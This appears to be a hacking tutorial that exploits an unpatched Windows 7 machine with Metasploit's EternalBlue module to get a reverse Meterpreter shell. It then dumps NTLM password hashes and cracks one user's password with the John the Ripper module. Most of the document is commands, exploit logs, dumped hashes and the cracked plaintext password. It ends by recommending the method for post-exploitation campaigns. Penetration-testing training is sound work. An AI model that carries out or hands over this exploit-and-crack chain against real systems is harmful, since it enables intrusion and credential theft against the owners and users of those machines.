There are many password-cracking tools out there, but one of the mainstays has always been John the Ripper. It's a powerful piece of software that can be configured and used in many different ways. Metasploit actually contains a little-known module version of JTR that can be used to quickly crack weak passwords, so let's explore it in an attempt to save precious time and effort.
We will be using an unpatched version Windows 7 as the target, so if you have a copy lying around, feel free to use it. The method of exploitation doesn't matter so much here, as long as you can get a Meterpreter session on the target. The John the Ripper module should work on any version of Windows we can grab the hashes from. In this tutorial, we will obtain the hash of an additional user that has logged onto the system (admin2).
Compromise the PC
To begin, we will need to compromise the target and get a Meterpreter session. Since we know the target is running an unpatched version of Windows 7, we can use EternalBlue to quickly exploit the system from our Kali box.
We will need Metasploit's built-in database up and running for the John the Ripper module to work later, so start it with the following command:
~# service postgresql start
Then, fire up Metasploit by typing msfconsole in the terminal:
~# msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
. .
.
dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB
dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP
.
.
o To boldly go where no
shell has gone before
=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 >
Next, load the EternalBlue exploit module with the use command:
msf5 > use exploit/windows/smb/ms17_010_eternalblue
Set the appropriate options, and type run to launch:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.0.1:1337
[+] 10.10.0.104:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.0.104:445 - Connecting to target for exploitation.
[+] 10.10.0.104:445 - Connection established for exploitation.
[+] 10.10.0.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.0.104:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.0.104:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.104:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.104:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.104:445 - Starting non-paged pool grooming
[+] 10.10.0.104:445 - Sending SMBv2 buffers
[+] 10.10.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.104:445 - Sending final SMBv2 buffers.
[*] 10.10.0.104:445 - Sending last fragment of exploit packet!
[*] 10.10.0.104:445 - Receiving response from exploit packet
[+] 10.10.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.104:445 - Sending egg to corrupted connection.
[*] 10.10.0.104:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.104
[*] Meterpreter session 1 opened (10.10.0.1:1337 -> 10.10.0.104:49212) at 2019-06-27 11:56:09 -0500
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
We now have a working Meterpreter session on the target.
Grab Some Hashes
The next thing we need to do is obtain the hashes of any users on the system. Meterpreter has an awesome feature called hashdump that will automatically dump the hashes for us:
meterpreter > hashdump
admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Unfortunately, all this does is display them on-screen. We need to save these to the database so the JTR module can work its magic. First, background the current session:
meterpreter > background
[*] Backgrounding session 1...
Then, we can use the hashdump post module to grab the hashes from our target. Load it with the use command:
msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/hashdump
Metasploit post modules work by running on an existing session, which is why we need to background the session in the first place. We can type options to display the settings for the module:
msf5 post(windows/gather/hashdump) > options
Module options (post/windows/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
All we need to do is specify the session number we want to run this on. Use the set command to set the session to 1 (or whatever session number that is running in the background):
msf5 post(windows/gather/hashdump) > set session 1
session => 1
Now, simply type run and the module will gather the hashes:
msf5 post(windows/gather/hashdump) > run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 1c8cfe9e1146578ee29d759b84a0ab70...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
admin2:"shots"
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::
[*] Post module execution completed
We can see that we got the same hashes as before, but we also found a password hint for admin2. Nice. Now if we type creds at the prompt, Metasploit will display all the credentials that are currently stored in the database:
msf5 post(windows/gather/hashdump) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
10.10.0.104 10.10.0.104 445/tcp (smb) guest aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.10.0.104 10.10.0.104 445/tcp (smb) administrator aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.10.0.104 10.10.0.104 445/tcp (smb) admin2 aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7 NTLM hash nt,lm
This shows us the host, service, and associated credentials, as well as the hash type. Now all that's left to do is crack that hash.
Crack the Hash
Metasploit's John the Ripper module is extremely useful when you need to quickly crack hashes — without needing to bother loading up John externally. It is also useful to try as a first pass since it usually takes no time at all and could potentially uncover weak passwords.
Now that we have our hashes stored in the database, load the JTR module with the use command:
msf5 post(windows/gather/hashdump) > use auxiliary/analyze/jtr_windows_fast
We can take a look at the available options for this module:
msf5 auxiliary(analyze/jtr_windows_fast) > options
Module options (auxiliary/analyze/jtr_windows_fast):
Name Current Setting Required Description
---- --------------- -------- -----------
CONFIG no The path to a John config file to use instead of the default
CUSTOM_WORDLIST no The path to an optional custom wordlist
ITERATION_TIMEOUT no The max-run-time for each iteration of cracking
JOHN_PATH no The absolute path to the John the Ripper executable
KORELOGIC false no Apply the KoreLogic rules to Wordlist Mode(slower)
MUTATE false no Apply common mutations to the Wordlist (SLOW)
POT no The path to a John POT file to use instead of the default
USE_CREDS true no Use existing credential data saved in the database
USE_DB_INFO true no Use looted database schema info to seed the wordlist
USE_DEFAULT_WORDLIST true no Use the default metasploit wordlist
USE_HOSTNAMES true no Seed the wordlist with hostnames from the workspace
USE_ROOT_WORDS true no Use the Common Root Words Wordlist
There are options to use a custom wordlist or the powerful KoreLogic rules, but for now, we will keep the default options as they are. Type run to kick it off:
msf5 auxiliary(analyze/jtr_windows_fast) > run
[*] Hashes Written out to /tmp/hashes_tmp20190627-25408-1bio0bp
[*] Wordlist file written out to /tmp/jtrtmp20190627-25408-8tghjo
[*] Cracking lm hashes in normal wordlist mode...
Using default input encoding: UTF-8
Using default target encoding: CP850
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2019-06-27 12:16) 0g/s 261783p/s 261783c/s 261783C/s PLANAR..VAGRANT
Session completed
[*] Cracking lm hashes in single mode...
Using default input encoding: UTF-8
Using default target encoding: CP850
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 DONE (2019-06-27 12:16) 0g/s 2527Kp/s 2527Kc/s 2527KC/s LLB1903..E1900
Session completed
[*] Cracking lm hashes in incremental mode (Digits)...
Using default input encoding: UTF-8
Using default target encoding: CP850
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2019-06-27 12:16) 0g/s 13386Kp/s 13386Kc/s 13386KC/s 0766269..0769743
Session completed
[*] Cracked Passwords this run:
[*] Cracking nt hashes in normal wordlist mode...
Using default input encoding: UTF-8
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2019-06-27 12:16) 0g/s 959350p/s 959350c/s 1918KC/s yesenia..yodelli
Session completed
[*] Cracking nt hashes in single mode...
Using default input encoding: UTF-8
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:07 DONE (2019-06-27 12:17) 0.1253g/s 8097Kp/s 8097Kc/s 11648KC/s yellowy1900..yodelli1900
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
[*] Cracking nt hashes in incremental mode (Digits)...
Using default input encoding: UTF-8
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:05 DONE (2019-06-27 12:17) 0g/s 20885Kp/s 20885Kc/s 20885KC/s 73673920..73673952
Session completed
We can see it starts out by attempting to crack any LM hashes, first in wordlist mode, followed by single-mode, and finally, incremental mode. Next, it follows the same procedure for any NT hashes that are present. Once it completes, it shows us any cracked passwords that it uncovered, along with the associated username:
[*] Cracked Passwords this run:
[+] admin2:tequila99
[-] Auxiliary failed: KeyError key not found: :address
[-] Call stack:
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:551:in `fetch'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:551:in `create_credential_service'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:301:in `block in create_credential_login'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:621:in `retry_transaction'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:300:in `create_credential_login'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:27:in `block (2 levels) in create_cracked_credential'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation/delegation.rb:46:in `each'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation/delegation.rb:46:in `each'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:25:in `block in create_cracked_credential'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:166:in `data_service_operation'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:15:in `create_cracked_credential'
[-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:26:in `create_cracked_credential'
[-] /usr/share/metasploit-framework/modules/auxiliary/analyze/jtr_windows_fast.rb:127:in `block (2 levels) in run'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/jtr/cracker.rb:173:in `block (2 levels) in each_cracked_password'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/jtr/cracker.rb:172:in `each_line'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/jtr/cracker.rb:172:in `block in each_cracked_password'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/jtr/cracker.rb:171:in `popen'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/jtr/cracker.rb:171:in `each_cracked_password'
[-] /usr/share/metasploit-framework/modules/auxiliary/analyze/jtr_windows_fast.rb:90:in `block in run'
[-] /usr/share/metasploit-framework/modules/auxiliary/analyze/jtr_windows_fast.rb:46:in `each'
[-] /usr/share/metasploit-framework/modules/auxiliary/analyze/jtr_windows_fast.rb:46:in `run'
[*] Auxiliary module execution completed
As an added bonus, when we use the creds command to view stored credentials in our database, we can now see the plaintext password is included:
msf5 auxiliary(analyze/jtr_windows_fast) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
admin2 tequila99 Password
10.10.0.104 10.10.0.104 445/tcp (smb) guest aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.10.0.104 10.10.0.104 445/tcp (smb) administrator aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.10.0.104 10.10.0.104 445/tcp (smb) admin2 aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7 NTLM hash nt,lm
Wrapping Up
In this tutorial, we learned about Metasploit's John the Ripper module and how to use it to quickly crack Windows hashes. We first exploited the target using EternalBlue and used the hashdump post module to grab user hashes and store them to the database. Then, we ran the JTR module right in Metasploit and cracked the hash of one of the users. Metasploit's JTR module makes it easy to obtain weak passwords in very little time, and it should be worth a shot in any Windows post-exploitation campaign.
Cover image by Martin Lopez/Pexels; Screenshots by drd_/Null Byte
Comments
No Comments Exist
Be the first, drop a comment!